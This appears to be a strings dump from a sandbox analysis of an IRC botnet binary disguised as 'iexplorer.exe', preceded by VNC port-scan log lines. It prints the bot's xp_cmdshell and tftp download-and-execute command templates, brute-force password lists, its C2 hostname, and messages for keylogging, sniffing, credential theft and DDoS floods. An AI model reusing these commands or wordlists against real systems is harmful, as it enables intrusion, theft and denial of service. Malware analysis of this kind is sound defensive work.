IP: 174.80.191.235:5900, Scan thread: 1, Sub-thread: 176.
IP: 174.80.191.235:5900, Scan thread: 1, Sub-thread: 176.
IP: 174.80.114.244:5900, Scan thread: 1, Sub-thread: 177.
IP: 174.80.114.244:5900, Scan thread: 1, Sub-thread: 177.
IP: 174.34.197.191:5900, Scan thread: 1, Sub-thread: 178.
IP: 174.34.197.191:5900, Scan thread: 1, Sub-thread: 178.
IP: 174.153.180.14:5900, Scan thread: 1, Sub-thread: 179.
IP: 174.153.180.14:5900, Scan thread: 1, Sub-thread: 179.
IP: 174.37.154.127:5900, Scan thread: 1, Sub-thread: 180.
IP: 174.37.154.127:5900, Scan thread: 1, Sub-thread: 180.
IP: 174.230.62.26:5900, Scan thread: 1, Sub-thread: 181.
IP: 174.230.62.26:5900, Scan thread: 1, Sub-thread: 181.
IP: 174.12.155.154:5900, Scan thread: 1, Sub-thread: 182.
IP: 174.12.155.154:5900, Scan thread: 1, Sub-thread: 182.
IP: 174.48.165.189:5900, Scan thread: 1, Sub-thread: 183.
IP: 174.48.165.189:5900, Scan thread: 1, Sub-thread: 183.
IP: 174.57.21.18:5900, Scan thread: 1, Sub-thread: 184.
IP: 174.57.21.18:5900, Scan thread: 1, Sub-thread: 184.
IP: 174.188.0.195:5900, Scan thread: 1, Sub-thread: 185.
IP: 174.188.0.195:5900, Scan thread: 1, Sub-thread: 185.
IP: 174.185.166.204:5900, Scan thread: 1, Sub-thread: 186.
IP: 174.185.166.204:5900, Scan thread: 1, Sub-thread: 186.
IP: 174.39.203.34:5900, Scan thread: 1, Sub-thread: 187.
IP: 174.39.203.34:5900, Scan thread: 1, Sub-thread: 187.
IP: 174.140.176.118:5900, Scan thread: 1, Sub-thread: 188.
IP: 174.140.176.118:5900, Scan thread: 1, Sub-thread: 188.
IP: 174.3.241.182:5900, Scan thread: 1, Sub-thread: 189.
IP: 174.3.241.182:5900, Scan thread: 1, Sub-thread: 189.
IP: 174.22.185.205:5900, Scan thread: 1, Sub-thread: 190.
IP: 174.22.185.205:5900, Scan thread: 1, Sub-thread: 190.
IP: 174.231.109.194:5900, Scan thread: 1, Sub-thread: 191.
IP: 174.231.109.194:5900, Scan thread: 1, Sub-thread: 191.
IP: 174.25.13.209:5900, Scan thread: 1, Sub-thread: 192.
IP: 174.25.13.209:5900, Scan thread: 1, Sub-thread: 192.
IP: 174.151.35.149:5900, Scan thread: 1, Sub-thread: 193.
IP: 174.151.35.149:5900, Scan thread: 1, Sub-thread: 193.
IP: 174.85.170.219:5900, Scan thread: 1, Sub-thread: 194.
IP: 174.85.170.219:5900, Scan thread: 1, Sub-thread: 194.
IP: 174.178.22.251:5900, Scan thread: 1, Sub-thread: 195.
IP: 174.178.22.251:5900, Scan thread: 1, Sub-thread: 195.
IP: 174.132.137.37:5900, Scan thread: 1, Sub-thread: 196.
IP: 174.132.137.37:5900, Scan thread: 1, Sub-thread: 196.
IP: 174.127.156.6:5900, Scan thread: 1, Sub-thread: 197.
IP: 174.127.156.6:5900, Scan thread: 1, Sub-thread: 197.
IP: 174.168.67.146:5900, Scan thread: 1, Sub-thread: 198.
IP: 174.168.67.146:5900, Scan thread: 1, Sub-thread: 198.
IP: 174.11.174.18:5900, Scan thread: 1, Sub-thread: 199.
IP: 174.11.174.18:5900, Scan thread: 1, Sub-thread: 199.
IP: 174.209.151.151:5900, Scan thread: 1, Sub-thread: 200.
IP: 174.209.151.151:5900, Scan thread: 1, Sub-thread: 200.
[07-30-2014 01:51:04] [FTP]: Server started on Port: 0, File: %System%\iexplorer.exe, Request: iexplorer.exe.
exe, Re[07-30-2014 01:51:04] .9-.1::.0[.12 120|MoD.0 ].1::.9-. Server started on Port: 69, File: %System%\iexplorer.exe, R
[07-30-2014 01:51:04] Joined channel: ##!v!##
[07-30-2014 01:51:03] Connected to frozynv.ODIN2-VALHALL.COM
%System%\iexplorer.exe
iexplorer.exe_1652_rwx_00400000_0007B000:
.text
`.rdata
@.data
tTSSh,
YYu.jWX
uDPh
GWSSh
t1SSSSh
u.hpfB
(msql)
Trying: (%s:%d) user: (%s/%s).
IP: %s
EXEC master..xp_cmdshell '%s'
EXEC master..xp_cmdshell 'del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s&del eq
DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s
winpass
sqlpassoainstall
databasepassword
databasepass
dbpassword
dbpass
domainpassword
domainpass
loginpass
login
windows
1234567890
123456789
12345678
1234567
pass1234
passwd
password
password1
Windows XP (SP0 SP1)
Windows NT4, 2000 (SP0-SP4)
\\%s\pipe\browser
\\%s\ipc$
sqlpass
%s %s %s User: (%s) Pass: (%s)
(no password)
%s\%s\%s
c$\windows\system32
%s\ipc$
99999999
21122112
00000000
Password
newpass
passe
!@#$%^&*
~!@#$%^&
monkey
7654321
87654321
%systemroot%\system32\cmd.exe
VNC%d.%d %s: %s - [NoPassword]
VNC%d.%d %s: %s - %s
VNC%d.%d %s: %s - [AuthBypass]
RFB d.d
del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s &del eq
port
nick
join
tftp
rndnick
httpstop
opencmd
cmdstop
rcmd
httpcon
keylog
*@im.batman
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
%s Error: %s <%d>.
explorer.exe
%s %s
%%comspec%% /c %s %s
del "%s"
%sdel.bat
%s %s :%s
PRIVMSG
PRIVMSG %s :%s
%s Failed to start IO thread, error %d
cmd.exe
%s: %s (%s)
The following Windows services are registered:
%s User info error: <%ld>
Units Per Week: %d
Max. Storage: %d
User's Language: %d
Country Code: %d
Workstations: %S
Logon Server: %S
Last Logoff: %d
Last Logon: %d
Number of Logins: %d
Bad Password Count: %d
Password Age: %d
Parameters: %S
Home Directory: %S
Auth Flags: %d
Privilege Level: %s
Comment: %S
User Comment: %S
Full Name: %S
Account: %S
The password is shorter than required (or does not meet the password policy requirement.)
The operation is allowed only on the primary domain controller of the domain.
This network request is not supported.
%s %s <Server: %S> <Message: %S>
%s Message sent successfully
%s Not supported by this system
%s Unable to allocation ARP cache
%s Error getting ARP cache %d
%s ARP cache is empty
%s Error getting ARP cache %d
%d.%d.%d.%d
%s %s HTTP/1.1
Referer: %s
Host: %s
%s %s Drive (%s): %s total, %s free, %s available.
%s %s Drive (%s): Failed to stat, device not ready.
%s (%d)
%s Process list failed
%s Process list completed
%s Listing processes:
%s Netapi32.dll couldn't be loaded
%s Network shares deleted
%s Failed to delete '%S' share.
%s Share '%S' deleted.
%s Failed to delete '%s' share.
%s Share '%s' deleted.
%s Advapi32.dll couldn't be loaded
%s Failed to open IPC$ Restriction registry key
%s Restricted access to the IPC$ Share
%s Failed to restrict access to the IPC$ Share
%s Failed to open DCOM registry key
%s DCOM disabled
%s Disable DCOM failed
%s Network shares added
%s Failed to add '%s' share.
%s Share '%s' added.
%s Failed to open IPC$ restriction registry key
%s Unrestricted access to the IPC$ Share
%s Failed to unrestrict access to the IPC$ Share
%s DCOM enabled
%s Enable DCOM failed
%s Transfer Complete On %s Executing ::(
%s Error: socket() failed, returned: %d
%s Failed to send to Remote command shell
%s Failed to open remote command shell
%s Failed to open socket
%s Transfer complete to IP: %s Filename: %s (%s bytes)
%s Unable to open socket
.DCC SEND %s %i %i %i.
%s File doesn't exist
%s Failed to bind to socket
%s Failed to create socket
%s Transfer complete from IP: %s Filename: %s (%s bytes)
%s Socket error
%s Error opening socket
%s Error opening file for writing
%s Error unable to write file to disk
%d. %s = %s
%s IP: %s Port: %d is open
IP: %s Port: %d
%s Bad URL, or DNS Error: %s
%s Update failed: Error executing file: %s
%s Downloaded %.1fKB to %s @ %.1fKB/sec. Updating
%s Opened: %s
%s Downloaded %.1f KB to %s @ %.1f KB/sec.
A%s CRC Failed (%d != %d)
%s Filesize is incorrect: (%d != %d).
%s Update: %s (%dKB transferred)
%s File download: %s (%dKB transferred)
%s Couldn't open file: %s
%s %s: No service specified
%s Error with service: '%s'. %s
%s %s service: '%s'.
%s %s: No share specified
%s %s share: '%s'.
%s %s: Error with share: '%s'. %s
%s Share list error: %s <%ld>
%s %s: No username specified
%s %s: Error with username: '%s'. %s
%s %s username: '%s'
Total users found: %d.
%s An access violation has occured
%s User list error: %s <%ld>
PRIVMSG %s :Found %s Files and %s Directories
<TD WIDTH="%d"><CODE>%s</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>
"><CODE>%s</CODE>
PRIVMSG %s :%-31s %-21s (%s bytes)
<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>
"><CODE>%s/</CODE>
%s%s/
<TD WIDTH="%d"><A HREF="
PRIVMSG %s :%-31s %-21s
%2.2d/%2.2d/M %2.2d:%2.2d %s
<TD COLSPAN=" 3="3"><CODE>Parent Directory</CODE></A></TD>
Searching for: %s
<TD WIDTH="%d"><CODE>Name</CODE></TD>
<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>
<H1>Index of %s</H1>
<TITLE>Index of %s</TITLE>
PRIVMSG %s :Searching for: %s
%s List complete.
HTTP/1.0 200 OK
Content-Type: %s
Date: %s %s GMT
Last-Modified: %s %s GMT
Expires: %s %s GMT
%s Failed to start worker thread, error %d
%s Worker thread of server thread: %d
%s Error: server failed, returned %d
MODE %s %s
USERHOST %s
[SOCKS4]: Failed to start server thread, error: <%d>.
[SOCKS4]: Server started on: %s:%d.
%s Failed to start secure thread, error %d
%s %s System
[DDoS]: Failed to start flood thread, error: <%d>.
[DDoS]: Flooding: (%s:%s) for %s seconds.
[SYN]: Failed to start flood thread, error: <%d>.
[SYN]: Flooding: (%s:%s) for %s seconds.
[ICMP]: Failed to start flood thread, error: <%d>.
[ICMP]: Flooding: (%s) for %s seconds.
[UDP]: Failed to start flood thread, error: <%d>.
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
ICMP.dll not available
[PING]: Failed to start flood thread, error: <%d>.
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[TCP]: Invalid flood time must be greater than 0.
[TCP]: Failed to start flood thread, error: <%d>.
[TCP]: %s %s flooding: (%s:%s) for %s seconds.
[TCP]: Invalid flood type specified.
%s Uploading file: %s to: %s failed
%s Uploading file: %s to: %s
ftp.exe
-s:%s
open %s
put %s
%s\%i%i%i.dll
%s File not found: %s
tcpflood
udpflood
%s failed to start, no range specified
%s failed to start, syntax is invalid
%s already %d threads. too many specified
%s Failed to start, no range specified
%s Failed to start, syntax is invalid
%s Failed to start thread, error: %d
%s %s Method started at %s :%s for %d minutes %d delay %d threads
%s Already %d threads. Too many specified.
%s Failed to start, thread, error %d
%s Started: %s:%d with delay: %d(ms)
%s Downloading URL: %s to: %s
%s Rename: '%s' to: '%s'
%s Couldn't execute file
%s ID must be different than current running process
%s Failed to start download thread, error %d
%s Downloading update from: %s
%s%s.exe
ddos.random
ddos.ack
ddos.syn
%s Repeat not allowed in command line: %s
%s Repeat: %s
Mode change: %s
MODE %s
Action: %s: %.
ACTION %s
Privmsg: %s: %s
%s Alias added: %s
%s Gethost: %s
%s Unable to extract Gethost command
%s Gethost: %s , Command: %s
%s %s %s :%s
%s Command unknown
%s No message specified
%s User list failed
%s User list completed
%s Share list failed
%s Share list completed
%s Service list failed
%s Service list complete.
%s Failed to load advapi32.dll or netapi32.dll
[KEYLOG]: Failed to start logging thread, error: <%d>.
[KEYLOG]: Key logger active.
[KEYLOG]: Already running.
[KEYLOG]: No key logger thread found.
[KEYLOG]: Key logger stopped. (%d thread(s) stopped.)
[PSNIFF]: Carnivore stopped. (%d thread(s) stopped.)
[PSNIFF]: Failed to start sniffer thread, error: <%d>.
%s Read file failed: %s
%s Read file complete: %s
%s Commands: %s
%s Error sending to remote shell
%s Command sent
%s Client not open
List: %s
%s Send File: %s, User: %s
%s Deleted '%s'
%s Failed to terminate process ID: %s
%s Process killed ID: %s
%s Failed to terminate process: %s
%s Process killed: %s
%s Couldn't resolve hostname
%s Lookup: %s -> %s
%s Server changed to: '%s'
%s File opened: %s
%s Prefix changed to: '%c'
%s Failed to kill thread: %s
%s Killed thread: %s
%s No active threads found
%s Stopped: %d thread(s)
IRC Raw: %s
Parted channel: '%s'.
PART %s
Joined channel: '%s'.
Nick changed to: '%s'.
%s Currently %d Threads
%s Crashing bot
%s TfTp Server started on Port: %d, File: %s, Request: %s
%s Already running
%s Failed to start server thread, error %d
%s Server listening on IP: %s:%d, Directory: %s\.
%s Failed to load dnsapi.dll
%s Failed to flush DNS cache
%s DNS cache flushed
%s Failed to flush ARP cache
%s ARP cache flushed
Login list complete
%d. %s
%s Remote shell ready
%s Couldn't open remote shell
%s Remote shell already running
%s Uptime: %s
%s Failed to start listing thread, error %d
%s Proccess list
%s Failed to start listing thread, error %d
%s Failed to start list thread, error %d
%s Bot ID: %s
%s Status: Ready. Bot Uptime: %s
QUIT :%s
[TFTP]
tftpstop
UDP flood
udpstop
ddos.stop
%s Invalid login slot number: %d
%s No user logged in at slot: %d
%s User %s logged out.
%s Random nick change: %s
$rndnick
User: %s logged in
%s *Failed host auth by: (%s!%s)
NOTICE %s :Host Auth failed (%s!%s).
%s *Failed pass auth by: (%s!%s)
NOTICE %s :Your attempt has been logged.
NOTICE %s :Pass auth failed (%s!%s).
NOTICE %s : Password(arg) = '%s'
NOTICE %s : Password(enc) = '%s'
NOTICE %s : Password = '%s'
NOTICE %s : Password(before) = '%s'
NOTICE %s : Authost = '%s'
NOTICE %s : Nickconst = '%s'
NOTICE %s : Channel = '%s'
NOTICE %s : Server = '%s'
NOTICE %s : Version = '%s'
NOTICE %s : Id = '%s'
%s Chat failed by unauthorized user: %s
%s Chat already active with user: %s
%s Failed to start chat thread, error %d
%s Chat from user: %s
%s Receive file: '%s' failed from unauthorized user: %s.
NOTICE %s :
PING %s
VERSION %s
%s Failed to start transfer thread, error %d
%s Receive file: '%s' from user: %s.
%s User: %s logged out
Joined channel: %s
:%s%s
NICK
NOTICE %s :%s
%s User %s logged out
NICK %s
JOIN %s %s
PONG %s
USER %s 0 0 :%s
PASS %s
Connected to %s
%s Bot started
%s Bot started
%s %d "%s"
%s %d "%s"
%s\%s
%s\%s
Total: %d in %s
Total: %d in %s
[%s]: %d,
[%s]: %d,
tftp -i %s get %s &%s
tftp -i %s get %s &%s
%s Scan not active.
%s Current IP: %s
[FTP]: Failed to start server, error: <%d>.
[FTP]: Server started on Port: %d, File: %s, Request: %s.
%s Failed to start server, error: <%d>.
%s Server started on Port: %d, File: %s, Request: %s.
IP: %s, Port %d is open.
IP: %s:%d, Scan thread: %d, Sub-thread: %d.
%s Finished at %s:%d after %d minute(s) of scanning.
Failed to start worker thread, error: <%d>.
%s:%d, Scan thread: %d, Sub-thread: %d.
-[DDoS]: Send error: <%d>.
IP: %s (%s).
200 PORT command successful.
%s.%s.%s.%s
PORT
425 Passive not supported on this server
215 StnyFtpd
331 Password required
220 StnyFtpd 0wns j0
[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[ICMP]: Error: setsockopt() failed, returned: <%d>.
[ICMP]: Error: socket() failed, returned: <%d>.
[KEYLOG]: %s
[%d-%d-%d %d:%d:%d] %s
%s (Return) (%s)
%s (Buffer full) (%s)
%s (Changed Windows: %s)
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
iphlpapi.dll
dnsapi.dll
netapi32.dll
icmp.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
gdi32.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
advapi32.dll
GetKeyState
GetAsyncKeyState
ExitWindowsEx
user32.dll
kernel32.dll
Avicap32.dll failed. <%d>
Odbc32.dll failed. <%d>
Shell32.dll failed. <%d>
Mpr32.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Dnsapi.dll failed. <%d>
Netapi32.dll failed. <%d>
Icmp.dll failed. <%d>
Wininet.dll failed. <%d>
Ws2_32.dll failed. <%d>
Gdi32.dll failed. <%d>
Advapi32.dll failed. <%d>
User32.dll failed. <%d>
Kernel32.dll failed. <%d>
%s.bck
sfc_os.dll
TCPIP.SYS fixed, version %d.
%s\drivers\tcpip.sys
Patching tcpip.sys.
[PING]: Finished sending pings to %s.
[PING]: Error sending pings to %s.
[UDP]: Finished sending packets to %s.
[UDP]: Error sending pings to %s.
https:/
http:/
[pStore] %s %s:%s
pstorec.dll
|%.2d|%s|
[%d]%s
[%s|%s|%s|%s]-
Ý %dh %dm
[PSNIFF]: Error: recv() failed, returned: <%d>
[PSNIFF]: Suspicious %s packet from: %s:%d - %s.
[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.
[PSNIFF]: Error: bind() failed, returned: <%d>.
[PSNIFF]: Error: socket() failed, returned: <%d>.
[SOCKS4]: Error: Failed to connect to target, returned: <%d>.
[SOCKS4]: Error: Failed to open socket(), returned: <%d>.
[SOCKS4]: Authentication failed. Remote userid: %s != %s.
[SOCKS4]: Failed to start server on Port %d.
[SOCKS4]: Failed to start client thread, error: <%d>.
[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.
[SYN]: Send error: <%d>.
%s [CpU]: %I64uMHz. [RaM] %sKB total, %sKB free. [DiSk] %s total, %s free. [Os] Windows %s (%d.%d, Build %d). [SyS DiR] %s. [HoStNaMe] %s (%s). [CuRrEnT uSeR] %s. [DaTe] %s. [TiMe] %s. [UpTiMe] %s
%s (%s)
%s [TyPe] %s (%s). [Ip AdDrEsS] %s. [HoStNaMe] %s.
[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[TCP]: Invalid target IP.
[TCP]: Error: setsockopt() failed, returned: <%d>.
[TCP]: Error: socket() failed, returned: <%d>.
:POST / HTTP/1.0
Content-Length: %d
: Europe[ %d kbit/s] USA[ %d kbit/s] Asia[ %d kbit/s] Average[ %d kbit/s]
%s No %s thread found.
%s %s %s stopped. (%d thread(s) stopped.)
mscoree.dll
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
GetProcessWindowStation
PeekNamedPipe
CreatePipe
KERNEL32.dll
USER32.dll
WS2_32.dll
VERSION.dll
GetCPInfo
iexplorer.exe
sysconfig.dat
Software\\Microsoft\\Windows\\CurrentVersion\\Run
Software\\Microsoft\\Windows\\CurrentVersion\\RunServices
frozynv.ODIN2-VALHALL.COM
ntpass
NTPass
sql-1433
tftp.exe -i get
:.login
:!login
:.ident
:.hashin
:.secure
:.auth
login
.download
.update
getcftp
JOIN #
NICK
now an IRC Operator
paypal.com
PAYPAL.COM
e-gold.com
e-gold.co.uk
.9-.1::.0[.12 120|MoD.0 ].1::.9-. Server started on Port: 69, File: %System%\iexplorer.exe, Request: iexplorer.exe.
[FTP]: Server started on Port: 0, File: %System%\iexplorer.exe, Request: iexplorer.exe.
[07-30-2014 01:51:04] [FTP]: Server started on Port: 0, File: %System%\iexplorer.exe, Request: iexplorer.exe.
exe, Re[07-30-2014 01:51:04] .9-.1::.0[.12 120|MoD.0 ].1::.9-. Server started on Port: 69, File: %System%\iexplorer.exe, R
[07-30-2014 01:51:04] Joined channel: ##!v!##
[07-30-2014 01:51:03] Connected to frozynv.ODIN2-VALHALL.COM
%System%\iexplorer.exe
csrss.exe_492:
csrss.exe_492_rwx_00400000_0005A000: